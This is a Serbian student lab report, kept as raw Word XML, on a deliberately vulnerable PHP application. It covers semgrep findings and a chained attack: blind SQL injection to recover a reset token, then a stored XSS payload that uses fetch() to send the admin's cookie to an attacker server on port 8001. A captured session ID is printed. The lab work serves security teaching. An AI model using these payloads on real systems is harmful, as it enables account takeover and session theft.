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E3AAA" w:rsidRDefault="00D05511">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>Vežbe 5</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00000002" w14:textId="77777777" w:rsidR="000E3AAA" w:rsidRDefault="00D05511">
      <w:pPr>
        <w:spacing w:before="240" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>Statička analiza koda</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00000003" w14:textId="77777777" w:rsidR="000E3AAA" w:rsidRDefault="00D05511">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Za statičku analizu koda je iskorišćena biblioteka semgrep. Pronađeni su sledeći problemi u kodu:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00000004" w14:textId="77777777" w:rsidR="000E3AAA" w:rsidRDefault="00D05511">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="240" w:after="120"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="0" w:name="_5kk8bkbhkutf" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkEnd w:id="0"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>1. Insecure Deserialization (admin/import_user.php)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00000005" w14:textId="77777777" w:rsidR="000E3AAA" w:rsidRDefault="00D05511">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>U fajlu admin/import_user.php pronađena je upotreba funkcije unserialize() nad korisničkim ulazom. Ova praksa predstavlja rizik od deserijalizacije nepouzdanih podataka, što može dovesti do izvršavanja proizvoljnog koda na serveru (Remote Code Execution).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00000006" w14:textId="77777777" w:rsidR="000E3AAA" w:rsidRDefault="00D05511">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>CWE: CWE-502 (Deserialization of Untrusted Data)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00000007" w14:textId="77777777" w:rsidR="000E3AAA" w:rsidRDefault="00D05511">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>OWASP: A08 - Insecure Deserialization / Software Integrity Failures</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00000008" w14:textId="77777777" w:rsidR="000E3AAA" w:rsidRDefault="00D05511">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Uticaj: potencijalno izvršavanje koda na serveru</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00000009" w14:textId="77777777" w:rsidR="000E3AAA" w:rsidRDefault="00D05511">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Pouzdanost detekcije: niska (LOW)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0000000A" w14:textId="77777777" w:rsidR="000E3AAA" w:rsidRDefault="00D05511">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="240" w:after="120"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="1" w:name="_oea8xh8ckai3" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkEnd w:id="1"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>2. SQL Injection (forgotusername.php)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0000000B" w14:textId="77777777" w:rsidR="000E3AAA" w:rsidRDefault="00D05511">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>U fajlu forgotuser</w:t>
      </w:r>
      <w:r>
        <w:t>name.php uočeno da se korisnički unos direktno ubacuje u SQL upit bez korišćenja prepared statements. Ovo otvara mogućnost za SQL injection napad, kojim napadač može manipulisati bazom podataka ili izvući osetljive informacije.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0000000C" w14:textId="77777777" w:rsidR="000E3AAA" w:rsidRDefault="00D05511">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>CWE: CWE-89 (SQL Injection)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0000000D" w14:textId="77777777" w:rsidR="000E3AAA" w:rsidRDefault="00D05511">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>OWASP: A03 - Injection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0000000E" w14:textId="77777777" w:rsidR="000E3AAA" w:rsidRDefault="00D05511">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Uticaj: srednji (MEDIUM), potencijalno curenje ili izmena podataka</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0000000F" w14:textId="77777777" w:rsidR="000E3AAA" w:rsidRDefault="00D05511">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Verovatnoća: visoka (HIGH)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00000010" w14:textId="77777777" w:rsidR="000E3AAA" w:rsidRDefault="00D05511">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:spacing w:before="240" w:after="120"/>
      </w:pPr>
      <w:bookmarkStart w:id="2" w:name="_3q7ao3nf0lfv" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkEnd w:id="2"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>Login Bypass</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00000011" w14:textId="77777777" w:rsidR="000E3AAA" w:rsidRDefault="00D05511">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Napad je izveden u tri koraka. Prvo je pozvan endpoint /forgotpassword.php sa korisničkim imenom user1 kako bi aplikacija gene</w:t>
      </w:r>
      <w:r>
        <w:t>risala reset token i upisala ga u bazu. Nakon toga, iskorišćena je SQL Injection ranjivost u endpointu /forgotusername.php, gde se korisnički unos direktno konkatenira u SQL upit bez ikakve validacije. Injektovanjem payload-a koji sadrži SUBSTR(token, i, 1</w:t>
      </w:r>
      <w:r>
        <w:t>) = 'c' u polje korisničkog imena, skript je iterativno proveravao tačnost svakog karaktera tokena na osnovu toga da li odgovor sadrži "User exists!". Ovim postupkom, karakter po karakter kroz svih 32 pozicije, ceo token je rekonstruisan i zatim upotreblje</w:t>
      </w:r>
      <w:r>
        <w:t>n na /resetpassword.php za postavljanje nove lozinke, čime je napad završen.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00000012" w14:textId="77777777" w:rsidR="000E3AAA" w:rsidRDefault="00D05511">
      <w:pPr>
        <w:spacing w:before="120"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Alternativni pristup bio bi ekstrakcija hash-a lozinke direktno iz tabele users, što je moguće analognim payload-om oblika SUBSTR(password, i, 1) = 'c' nad heksaadecimalnim alfabe</w:t>
      </w:r>
      <w:r>
        <w:t>tom. Međutim, ovaj metod ima nekoliko praktičnih nedostataka. Hash je jednosmerna kriptografska funkcija, što znači da se iz njega ne može direktno dobiti originalna lozinka, za to je potrebno koristiti eksterne baze poznatih hash lozinka parova ili pokren</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">uti napad rečnikom. Takve baze ne pokrivaju sve moguće lozinke, a lozinke koje su dovoljno kompleksne ili retke neće biti pronađene. Napad putem reset tokena je zato direktniji i pouzdaniji, token ima kratак životni vek i ne zahteva nikakvo dekriptovanje, </w:t>
      </w:r>
      <w:r>
        <w:t>već se može odmah iskoristiti.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78711D1B" w14:textId="77777777" w:rsidR="00F232CC" w:rsidRDefault="00F232CC">
      <w:pPr>
        <w:spacing w:before="120"/>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="224EF243" w14:textId="77777777" w:rsidR="00F232CC" w:rsidRPr="00D05511" w:rsidRDefault="00F232CC" w:rsidP="00F232CC">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr>
          <w:b/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D05511">
        <w:rPr>
          <w:b/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Admin Privilege Escalation (PrivEsc)</w:t>
      </w:r>
      <w:bookmarkStart w:id="3" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="3"/>
    </w:p>
    <w:p w14:paraId="49B0C171" w14:textId="77777777" w:rsidR="00F232CC" w:rsidRPr="00294E5E" w:rsidRDefault="00F232CC" w:rsidP="00294E5E">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00294E5E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Nakon uspešnog preuzimanja kontrole nad nalogom običnog korisnika (</w:t>
      </w:r>
      <w:r w:rsidRPr="00294E5E">
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>user1</w:t>
      </w:r>
      <w:r w:rsidRPr="00294E5E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">), sledeći korak u lancu napada bio je podizanje privilegija na nivo administratora. Analizom koda u fajlu </w:t>
      </w:r>
      <w:r w:rsidRPr="00294E5E">
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>profile.php</w:t>
      </w:r>
      <w:r w:rsidRPr="00294E5E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>, uočeno je da se opis korisnika (</w:t>
      </w:r>
      <w:r w:rsidRPr="00294E5E">
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>description</w:t>
      </w:r>
      <w:r w:rsidRPr="00294E5E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>) prilikom ažuriranja profila skladišti u bazu podataka i kasnije prikazuje na administratorskoj početnoj strani bez adekvatne sanitizacije ili enkodiranja izlaza.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CF9E25F" w14:textId="77777777" w:rsidR="00F232CC" w:rsidRPr="00294E5E" w:rsidRDefault="00F232CC" w:rsidP="00294E5E">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00294E5E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Ovaj propust omogućava </w:t>
      </w:r>
      <w:r w:rsidRPr="00294E5E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Stored Cross-Site Scripting (XSS)</w:t>
      </w:r>
      <w:r w:rsidRPr="00294E5E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> napad.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="396E1394" w14:textId="77777777" w:rsidR="00F232CC" w:rsidRPr="00F232CC" w:rsidRDefault="00F232CC" w:rsidP="00F232CC">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:rPr>
          <w:b/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F232CC">
        <w:rPr>
          <w:b/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>1. Stored XSS (profile.php / index.php)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EF1F007" w14:textId="77777777" w:rsidR="00F232CC" w:rsidRPr="00294E5E" w:rsidRDefault="00F232CC" w:rsidP="00294E5E">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00294E5E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Aplikacija ne filtrira HTML i JavaScript karaktere u polju za opis, što omogućava napadaču da ubaci maliciozni skript koji će se izvršiti u browseru svakog korisnika (u ovom slučaju administratora) koji pregleda listu korisnika.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32921F86" w14:textId="77777777" w:rsidR="00F232CC" w:rsidRPr="00294E5E" w:rsidRDefault="00F232CC" w:rsidP="00294E5E">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00294E5E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>CWE</w:t>
      </w:r>
      <w:r w:rsidRPr="00294E5E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>: CWE-79 (Improper Neutralization of Input During Web Page Generation)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AD02F7F" w14:textId="5A35E9F4" w:rsidR="00F232CC" w:rsidRPr="00294E5E" w:rsidRDefault="00F232CC" w:rsidP="00294E5E">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00294E5E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>OWASP</w:t>
      </w:r>
      <w:r w:rsidR="00294E5E" w:rsidRPr="00294E5E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>: A03:2021 -</w:t>
      </w:r>
      <w:r w:rsidRPr="00294E5E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Injection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FBAF07C" w14:textId="77777777" w:rsidR="00F232CC" w:rsidRPr="00294E5E" w:rsidRDefault="00F232CC" w:rsidP="00294E5E">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00294E5E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Uticaj</w:t>
      </w:r>
      <w:r w:rsidRPr="00294E5E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>: Visok (HIGH), omogućava krađu sesije administratora.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11A87441" w14:textId="77777777" w:rsidR="00F232CC" w:rsidRPr="00294E5E" w:rsidRDefault="00F232CC" w:rsidP="00294E5E">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00294E5E">
        <w:rPr>
          <w:b/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>2. Hijacking administratorske sesije</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0680A5BA" w14:textId="77777777" w:rsidR="00F232CC" w:rsidRPr="00294E5E" w:rsidRDefault="00F232CC" w:rsidP="00294E5E">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00294E5E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Napad je izveden automatizovanim Python skriptom koji je, koristeći prethodno kompromitovane kredencijale za </w:t>
      </w:r>
      <w:r w:rsidRPr="00294E5E">
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>user1</w:t>
      </w:r>
      <w:r w:rsidRPr="00294E5E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, postavio sledeći payload u polje opisa: </w:t>
      </w:r>
      <w:r w:rsidRPr="00294E5E">
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>&lt;script&gt;fetch('[http://host.docker.internal:8001/?cookie=](http://host.docker.internal:8001/?cookie=)' + document.cookie);&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10628852" w14:textId="77777777" w:rsidR="00F232CC" w:rsidRPr="00294E5E" w:rsidRDefault="00F232CC" w:rsidP="00294E5E">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00294E5E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Kada administrator pristupi početnoj stranici (što u laboratorijskom okruženju simulira automatizovani proces/bot), njegov browser izvršava ubačeni JavaScript. Skript šalje administratorski identifikator sesije (</w:t>
      </w:r>
      <w:r w:rsidRPr="00294E5E">
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>PHPSESSID</w:t>
      </w:r>
      <w:r w:rsidRPr="00294E5E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>) na eksterni server pod kontrolom napadača (u ovom slučaju Python HTTP server na portu 8001).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F146AA9" w14:textId="77777777" w:rsidR="00F232CC" w:rsidRPr="00294E5E" w:rsidRDefault="00F232CC" w:rsidP="00294E5E">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00294E5E">
        <w:rPr>
          <w:b/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Rezultat i potvrda napada</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D4CAA10" w14:textId="77777777" w:rsidR="00F232CC" w:rsidRPr="00294E5E" w:rsidRDefault="00F232CC" w:rsidP="00294E5E">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00294E5E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Uspešnim presretanjem zahteva dobijen je validan administratorski kolačić: </w:t>
      </w:r>
      <w:r w:rsidRPr="00294E5E">
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>PHPSESSID=1e69db657f2d05ab3f5c623287e4a99a</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41250B64" w14:textId="4A22E1A1" w:rsidR="00F232CC" w:rsidRPr="00294E5E" w:rsidRDefault="00F232CC" w:rsidP="00294E5E">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00294E5E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Ručnim umetanjem ovog tokena u browser (Session Hijacking), potvrđen je neovlašćeni pristup administratorskom panelu. Ovim je napadač stekao privilegije potrebne za pristup osetljivim funkcijama sistema, poput uvoza korisnika (</w:t>
      </w:r>
      <w:r w:rsidRPr="00294E5E">
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>admin/import_user.php</w:t>
      </w:r>
      <w:r w:rsidRPr="00294E5E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>), čime je pripremljen teren za finalnu faz</w:t>
      </w:r>
      <w:r w:rsidR="00294E5E" w:rsidRPr="00294E5E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>u napada -</w:t>
      </w:r>
      <w:r w:rsidRPr="00294E5E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Remote Code Execution (RCE) putem nesigurne deserijalizacije.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26768368" w14:textId="77777777" w:rsidR="00F232CC" w:rsidRDefault="00F232CC">
      <w:pPr>
        <w:spacing w:before="120"/>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:sectPr w:rsidR="00F232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3FFC5223-E003-4497-B033-D1FDC857ADD5}"/>
  </w:font>
  <w:font w:name="Cambria">
    <w:panose1 w:val="02040503050406030204"/>
    <w:charset w:val="EE"/>
    <w:family w:val="roman"/>
    <w:pitch w:val="variable"/>
    <w:sig w:usb0="E00006FF" w:usb1="420024FF" w:usb2="02000000" w:usb3="00000000" w:csb0="0000019F" w:csb1="00000000"/>
    <w:embedRegular r:id="rId2" w:fontKey="{4107FA33-C8E5-4BCF-AF5B-5D999F88888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B71"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="452E7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531152"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="477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0000D"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="2F8A3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AAA"/>
    <w:rsid w:val="000E3AAA"/>
    <w:rsid w:val="00294E5E"/>
    <w:rsid w:val="002B4A4C"/>
    <w:rsid w:val="00366F40"/>
    <w:rsid w:val="00714564"/>
    <w:rsid w:val="00D05511"/>
    <w:rsid w:val="00F232C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62F855-113D-49DC-9377-F2F8E247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sr" w:eastAsia="sr-Latn-R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F232CC"/>
    <w:pPr>
      <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
      <w:sz w:val="24"/>
      <w:szCs w:val="24"/>
      <w:lang w:val="sr-Latn-RS"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="HTMLCode">
    <w:name w:val="HTML Code"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00F232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497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KORISNIK</cp:lastModifiedBy>
  <cp:revision>6</cp:revision>
